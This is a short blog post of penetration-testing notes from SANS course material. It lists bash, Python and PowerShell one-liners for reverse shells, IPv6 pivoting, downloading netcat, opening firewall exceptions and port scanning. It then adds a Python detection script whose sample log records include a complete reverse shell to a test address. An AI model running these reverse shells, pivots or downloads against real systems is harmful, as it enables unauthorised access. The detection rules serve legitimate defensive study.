07 Jan 2020

Cleaning House - SANS Pen test

We’re moving house, so the old SANS Pentesting posters and notes are headed for the recycle bin :(

I wouldn’t bother reading this post if I were you. Visit SANS.org or Google for “SANS posters”. They’re much better than anything here. Or, better still, do SANS 660.

Bash Notes

Pivot across the network via IPv6. Allow your IPv4 tools to work with IPv6.

sudo socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::6bb8:6aaa:fe40:9864]:80


nikto -host -port 8080

What's my IP on this machine?

curl -4 icanhazip.com

or

dig +short myip.opendns.com @resolver1.opendns.com

or

wget -qO- ifconfig.me/ip

Compress a partition and SSH it elsewhere

dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C me@ "cat >/tmpimage.dd"

The bash reverse shell:

bash -i >& /dev/tcp/ 0>&1

Encode:

echo "test" | base64

Decode:

echo "dGVzdAo=" | base64 -d

Quick website clone:

wget -r -nH $URL


Upgrade your raw shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Python reverse Shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python 2 web server:

python -m SimpleHTTPServer 8888

Python 3 web server:

python -m http.server 8888

Python web client

python3 -c 'import urllib.request; urllib.request.urlretrieve("","/tmp/thething.html")'

Debug:

python -m pdb exploit.py


Turn a Windows box into a wireless access point

netsh wlan set hostednetwork mode=allow ssid=nothingsketchy key=mypass && netsh wlan start hostednetwork

Build an IPv6 pivot

netsh interface portproxy add v4tov6 listenport=8080 listenaddress= connectport=<RPort> connectaddress=<RHost>

Keep an eye on network connections to the machine:

netstat -naob 1 | find "<ip or port>"

Process list: wmic process list full

Tasks and Services: tasklist /svc


Ping all the things

1..255 | % { echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | select-string ttl}

The PS Web Client

(cheeky way since Windows 8) wget "" -outfile "c:\temp\nc.exe"

But you should probably also know: (New-Object System.Net.WebClient).DownloadFile("", "c:\temp\nc.exe")

Check Firewall Rules: get-NetFirewallRule -all or get-netfirewallrule -all | export-csv "mycsv.csv"

Modify Firewall Rules: New-NetFirewallRule -action Allow -displayname LegitException -remoteAddress

Scan: 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).connect("<IP>",$_)) "Port $_ is open"} 2>$null
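
Seen from the logging side, most of the one-liners in these notes keep a recognisable shape wherever the full command string is recorded. The following is an added example, not part of the original notes: it matches those shapes against command-line records. The tab-separated record format, rule names, host names and addresses are all constructed for illustration.

```python
import re

# One rule per one-liner family from the notes above (rule names are hypothetical).
RULES = [
    ("socat-v4-to-v6-relay", re.compile(r"\bsocat\b.*TCP-LISTEN:\d+.*TCP6:", re.I)),
    ("netsh-portproxy-v4tov6", re.compile(r"\bnetsh\b.*\bportproxy\s+add\s+v4tov6\b", re.I)),
    ("netsh-hostednetwork", re.compile(r"\bnetsh\s+wlan\s+(set|start)\s+hostednetwork\b", re.I)),
    ("bash-dev-tcp-shell", re.compile(r"\bbash\s+-i\b.*/dev/tcp/")),
    ("python-pty-upgrade", re.compile(r"\bpython[\d.]*\s+-c\b.*pty\.spawn")),
    ("python-socket-shell", re.compile(r"\bpython[\d.]*\s+-c\b.*socket\.socket.*os\.dup2")),
    ("ps-webclient-download", re.compile(r"Net\.WebClient\)?\.DownloadFile", re.I)),
    ("ps-tcpclient-sweep", re.compile(r"\d+\.\.\d+\s*\|.*Net\.Sockets\.TcpClient", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Parse 'host<TAB>user<TAB>cmdline' records; return (host, user, hits) for matches."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records rather than guessing fields
        host, user, cmd = parts
        hits = classify(cmd)
        if hits:
            findings.append((host, user, hits))
    return findings

# Constructed sample records (TEST-NET addresses, hypothetical host names).
SAMPLE = [
    "web01\twww-data\tpython -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "web01\twww-data\tbash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "jump01\troot\tsocat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::1]:80",
    "ws07\talice\tnetsh interface portproxy add v4tov6 listenport=8080 connectport=80 connectaddress=fe80::1",
    "ws07\talice\tpowershell (New-Object System.Net.WebClient).DownloadFile(\"http://192.0.2.10/a\", \"c:\\temp\\a.bin\")",
    "ws07\talice\tpython -m http.server 8888",
    "db02\tbob\tdd if=/dev/sda1 bs=65536",
]

if __name__ == "__main__":
    for host, user, hits in scan(SAMPLE):
        print(f"{host}\t{user}\t{','.join(hits)}")
```

Shell redirections such as `>& /dev/tcp/...` are not part of a process's argument vector, so the bash rule only fires on sources that capture the whole command string (for example the argument to `bash -c`, or shell history).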


Chad Duffey

Security Engineer